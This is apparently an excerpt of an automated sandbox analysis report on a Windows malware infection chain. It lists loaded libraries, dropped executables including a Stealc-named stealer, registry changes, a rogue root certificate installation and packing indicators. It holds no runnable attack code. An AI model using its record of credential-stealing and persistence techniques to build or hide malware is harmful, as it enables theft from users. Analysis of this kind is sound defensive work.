                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: sfc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: sfc_os.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: wbemcomn.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: sxs.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: napinsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: pnrpnsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: wshbth.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: nlaapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: dnsapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: winrnr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: rasadhlp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: amsi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeSection loaded: dsound.dll
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeSection loaded: powrprof.dll
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeSection loaded: powrprof.dll
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeSection loaded: winmmbase.dll
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeSection loaded: umpdc.dll
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeSection loaded: appxsip.dll
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeSection loaded: opcservices.dll
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeSection loaded: ntmarta.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: dwrite.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeSection loaded: textshaping.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msisip.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wshext.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: esdsip.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpWindow found: window name: TMainForm
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAutomated click: OK
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAutomated click: OK
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAutomated click: OK
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAutomated click: OK
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fido Video Recorder_is1
                                  Source: file.exeStatic file information: File size 1973760 > 1048576
                                  Source: file.exeStatic PE information: Raw size of ukgzfzxu is bigger than: 0x100000 < 0x1b0400
                                  Source: Binary string: mozglue.pdbP source: stealc_default2.exe, 00000013.00000002.3061112605.0000000068E3D000.00000002.00000001.01000000.00000021.sdmp
                                  Source: Binary string: .pdb8 source: axplong.exe, 00000006.00000003.3054813558.0000000001620000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.0000000001620000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: nss3.pdb@ source: stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp
                                  Source: Binary string: nss3.pdb source: stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp
                                  Source: Binary string: mozglue.pdb source: stealc_default2.exe, 00000013.00000002.3061112605.0000000068E3D000.00000002.00000001.01000000.00000021.sdmp
                                  Source: Binary string: c:\rje\tg\7v\obj\Release\Qrr.pdb source: axplong.exe, 00000006.00000003.3054996905.0000000005F26000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.2999307768.0000000005F2B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138409494.0000000005F2C000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.2998919451.0000000005F23000.00000004.00000020.00020000.00000000.sdmp

                                  Data Obfuscation

                                  barindex
                                  Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.d70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ukgzfzxu:EW;svxbhzsv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ukgzfzxu:EW;svxbhzsv:EW;.taggant:EW;
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ukgzfzxu:EW;svxbhzsv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ukgzfzxu:EW;svxbhzsv:EW;.taggant:EW;
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 3.2.axplong.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ukgzfzxu:EW;svxbhzsv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ukgzfzxu:EW;svxbhzsv:EW;.taggant:EW;
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeUnpacked PE file: 23.2.fidovideorecorder32_64.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeUnpacked PE file: 23.2.fidovideorecorder32_64.exe.400000.0.unpack
                                  Source: neon[1].exe.6.dr, c2YQ.cs.Net Code: o5BJ System.Reflection.Assembly.Load(byte[])
                                  Source: neon.exe.6.dr, c2YQ.cs.Net Code: o5BJ System.Reflection.Assembly.Load(byte[])
                                  Source: Yara matchFile source: 36.2.rstxdhuj.exe.6610000.6.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000024.00000002.3164599118.0000000006610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000024.00000002.3009810672.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: newbundle2[1].exe.6.drStatic PE information: 0xEAE6B680 [Fri Nov 19 07:02:24 2094 UTC]
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001BBDF9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_001BBDF9
                                  Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                  Source: newbundle2.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x4f134
                                  Source: gold.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x5aa4a
                                  Source: neon[1].exe.6.drStatic PE information: real checksum: 0x0 should be: 0x38421f
                                  Source: 12dsvc[1].exe.6.drStatic PE information: real checksum: 0x0 should be: 0xe2c06
                                  Source: newbundle2[1].exe.6.drStatic PE information: real checksum: 0x0 should be: 0x4f134
                                  Source: axplong.exe.0.drStatic PE information: real checksum: 0x1e8032 should be: 0x1e8323
                                  Source: rstxdhuj[1].exe.6.drStatic PE information: real checksum: 0x0 should be: 0xfbc7f
                                  Source: file.exeStatic PE information: real checksum: 0x1e8032 should be: 0x1e8323
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: real checksum: 0x1e601c should be: 0x1d8601
                                  Source: neon.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x38421f
                                  Source: gold[1].exe.6.drStatic PE information: real checksum: 0x0 should be: 0x5aa4a
                                  Source: file.exeStatic PE information: section name:
                                  Source: file.exeStatic PE information: section name: .idata
                                  Source: file.exeStatic PE information: section name:
                                  Source: file.exeStatic PE information: section name: ukgzfzxu
                                  Source: file.exeStatic PE information: section name: svxbhzsv
                                  Source: file.exeStatic PE information: section name: .taggant
                                  Source: axplong.exe.0.drStatic PE information: section name:
                                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                                  Source: axplong.exe.0.drStatic PE information: section name:
                                  Source: axplong.exe.0.drStatic PE information: section name: ukgzfzxu
                                  Source: axplong.exe.0.drStatic PE information: section name: svxbhzsv
                                  Source: axplong.exe.0.drStatic PE information: section name: .taggant
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: section name:
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: section name: .idata
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: section name:
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: section name: ewzoukzh
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: section name: eahzsgud
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: section name: .taggant
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0587E090 push es; ret 9_2_0587E0A0
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0587C9C0 push es; ret 9_2_0587C9D0
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0587D871 push es; ret 9_2_0587D880
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06B8EFB2 push eax; ret 9_2_06B8EFC1
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00428E7D push esi; ret 13_2_00428E86
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004076E0 push ecx; ret 13_2_004076F3
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EE7333 push 04EC839Eh; mov dword ptr [esp], edi14_2_00EE733A
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeCode function: 15_2_010047D7 push esi; retf 0002h15_2_010047DA
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeCode function: 15_2_0100AD01 pushfd ; retf 0002h15_2_0100AD02
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeCode function: 15_2_0648E060 push es; ret 15_2_0648E070
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeCode function: 15_2_0648ECF2 push eax; ret 15_2_0648ED01
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001AD77C push ecx; ret 16_2_001AD78F
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0022D77C push ecx; ret 17_2_0022D78F
                                  Source: file.exeStatic PE information: section name: entropy: 7.981135166621274
                                  Source: file.exeStatic PE information: section name: ukgzfzxu entropy: 7.954114494969637
                                  Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.981135166621274
                                  Source: axplong.exe.0.drStatic PE information: section name: ukgzfzxu entropy: 7.954114494969637
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: section name: entropy: 7.98850986721473
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: section name: ewzoukzh entropy: 7.954562556297656
                                  Source: rstxdhuj[1].exe.6.drStatic PE information: section name: .text entropy: 7.989713684706289
                                  Source: gold[1].exe.6.drStatic PE information: section name: .text entropy: 7.996189613972712
                                  Source: gold.exe.6.drStatic PE information: section name: .text entropy: 7.996189613972712
                                  Source: 12dsvc[1].exe.6.drStatic PE information: section name: .text entropy: 7.999068736163035

                                  Persistence and Installation Behavior

                                  barindex
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 BlobJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\gold[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\is-8M782.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\is-S5HN7.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\libssl-1_1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\is-65AJA.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\uninstall\is-4OQD3.tmpJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\is-NSLMU.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\msvcr71.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\msvcp71.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeFile created: C:\Users\user\AppData\Local\Temp\1000065001\stories.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\is-AMTS2.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeJump to dropped file
